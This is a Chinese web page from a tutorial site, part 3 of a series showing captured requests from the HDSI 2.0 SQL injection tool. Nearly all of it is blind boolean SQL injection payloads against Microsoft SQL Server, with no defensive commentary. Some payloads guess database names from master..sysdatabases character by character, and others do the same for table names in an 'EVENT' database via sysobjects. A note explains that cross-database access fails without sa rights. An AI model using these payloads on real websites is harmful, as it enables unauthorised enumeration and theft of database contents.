当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > hdsi2.0 sql注入部分抓包(3)

安全防护
经典黑客远程网络攻击过程概要
妙用磁盘配额 让黑客无从下手
如何利用路由器做到防止DoS洪水攻击
服务器安全:防范拒绝服务攻击妙招
网络安全检测思路与技巧
保护Win2003网络服务器安全
百度空间存在js破坏漏洞 用户被威胁删除数据
7月22日Discuz.net被黑事件始末
DNS 系统漏洞被泄露,小心被攻击
大型网站服务器:数据库压力,网页优化,服务器负载

安全防护 中的 hdsi2.0 sql注入部分抓包(3)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 34 ::
收藏到网摘: n/a

跨库:

猜解数据库:

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
...
...
...


and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5


master 不是sa权限,不能跨库


猜解表名:

EventCategory

GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80


and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80